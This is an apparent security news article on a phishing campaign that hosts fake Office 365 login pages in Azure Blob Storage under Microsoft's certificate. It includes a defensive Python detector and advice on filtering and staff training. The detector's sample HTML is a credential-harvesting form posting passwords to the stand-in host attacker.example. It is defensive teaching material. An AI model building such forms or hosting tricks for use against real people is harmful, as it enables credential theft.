Phishers Using Azure Blob Storage to Host Phishing Forms with Valid Microsoft SSL Certificate

Cybercriminals are using Microsoft Azure Blob storage to host phishing forms. The page hosting the malicious files is served with a genuine Microsoft SSL certificate, which lends the campaign authenticity. Similar tactics have been used in the past for Dropbox phishing scams and attacks that impersonate other cloud storage platforms.

A typical phishing scenario involves an email with a button or hyperlink that the user is asked to click to access a cloud-hosted file. When the link is clicked, the user is directed to a website where they are required to enter login credentials, such as Office 365 credentials, to access the file.

This is the point at which the scam often falls apart. Frequently the web page looks unusual, the URL does not start with HTTPS, or the site has an invalid SSL certificate, and the unfamiliar domain or the browser warning raises a big red flag. However, if the user lands on a familiar-looking domain with a valid SSL certificate issued to a trusted brand, the likelihood of proceeding and entering login credentials is far higher.

That is exactly the case with Azure Blob storage. While the exact domain may look unfamiliar, it is a genuine Microsoft domain ending in .blob.core.windows.net and it is secured with an SSL certificate. A further check will reveal that the certificate is valid and has been issued by Microsoft IT TLS CA 5. The catch is that this is Microsoft's own certificate for the blob.core.windows.net service: it vouches for the hosting platform, not for whoever owns the storage account. Any Azure customer can create a storage account, upload an HTML file to a publicly readable container and have it served under that certificate, with the account name as the leading part of the hostname. A genuine-looking Office 365 login form then appears, asking for an email address and password to gain access to the document. This is likely to seem perfectly reasonable, since the user appears to be accessing a Microsoft document hosted on a Microsoft site.

However, entering credentials into the login box sends them to a server controlled by the attackers: the form submits to an attacker-controlled address rather than to Microsoft. The user is told that the document is being opened, but is then redirected to a different Microsoft site. While this redirect is a red flag, by this time it is too late, as the user's credentials have already been stolen.
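The two tells described above, a login page served from a public object-storage hostname and a credential form that posts somewhere other than the page's own origin, can be checked mechanically. The following is an added example written for this article, not code from the original page or from any vendor. It uses only the Python standard library; the storage account name, the sample HTML and the host attacker.example are constructed placeholders for illustration, not indicators from the real campaign.

```python
"""Flag object-storage URLs that serve credential-harvesting forms.

Added example for this article, not code from the original page. The
sample URL, HTML and the host 'attacker.example' are constructed; none
of them are indicators taken from the real campaign.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Public object-storage hostname suffixes under which anyone holding an
# account can publish an HTML page behind the provider's own certificate.
OBJECT_STORE_SUFFIXES = (
    ".blob.core.windows.net",   # Azure Blob Storage (the case in the article)
    ".s3.amazonaws.com",        # Amazon S3
    ".storage.googleapis.com",  # Google Cloud Storage
)


def is_object_store_host(host: str) -> bool:
    """True if host is a customer-controlled name under a shared storage domain."""
    host = host.lower().rstrip(".")
    return any(host.endswith(suffix) for suffix in OBJECT_STORE_SUFFIXES)


class _FormScanner(HTMLParser):
    """Collect each <form>'s action and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # list of {"action": str | None, "password": bool}
        self._current = None   # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action"), "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def analyze_page(page_url: str, html: str) -> dict:
    """Return phishing indicators for a page fetched from page_url."""
    page = urlsplit(page_url)
    scanner = _FormScanner()
    scanner.feed(html)

    cross_origin_targets = []
    for form in scanner.forms:
        if not form["password"]:
            continue
        # An absent action posts back to the page itself; relative actions
        # are resolved against the page URL before comparing origins.
        target = urlsplit(urljoin(page_url, form["action"] or ""))
        if target.netloc.lower() != page.netloc.lower():
            cross_origin_targets.append(target.netloc)

    on_object_store = is_object_store_host(page.hostname or "")
    return {
        "object_store_host": on_object_store,
        "has_password_form": any(f["password"] for f in scanner.forms),
        "cross_origin_post_targets": cross_origin_targets,
        # Verdict: a login form served from a bucket/container whose
        # submission leaves the hosting origin is the pattern in the article.
        "suspicious": on_object_store and bool(cross_origin_targets),
    }


# Constructed sample modelled on the campaign: a static "Office 365" sign-in
# page in a blob container whose form posts to an attacker-run host.
SAMPLE_URL = "https://exampleaccount.blob.core.windows.net/docs/SharedDocument.html"
SAMPLE_HTML = """
<html><body>
<img src="logo.png" alt="Office 365">
<form method="POST" action="https://attacker.example/collect.php">
  <input type="email" name="loginfmt">
  <input type="password" name="passwd">
  <button type="submit">Sign in</button>
</form>
</body></html>
"""

if __name__ == "__main__":
    print(analyze_page(SAMPLE_URL, SAMPLE_HTML))
```

The origin comparison is the important part: a genuine sign-in page submits to the same site (or to a known identity provider), whereas a harvesting page hosted in someone else's bucket has nowhere to send the credentials but the attacker's own server. In a mail gateway or proxy, the same check can be run on the HTML fetched from each object-storage link before the message is delivered.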

In this case, it was Office 365 credentials that the attackers were attempting to obtain, although the same scam could be used to harvest Azure credentials or other Microsoft logins.

Preventing email-based phishing attacks is easiest with anti-phishing controls at the email gateway that stop messages from reaching inboxes in the first place. An advanced spam filtering solution will block the majority of such emails. Office 365 users should strongly consider augmenting the built-in Office 365 protection with a third-party spam filter for greater coverage.

No anti-phishing solution will prevent all phishing emails from reaching inboxes, so it is vital for employees to be taught security best practices and to receive specific anti-phishing training. In addition to training on the most common phishing scams, end users should be educated about scams that abuse cloud services and object-store URLs, so that a login page served from a storage bucket or blob container is recognized as suspect even when the padlock is present and the certificate is valid.

Author: NetSec Editor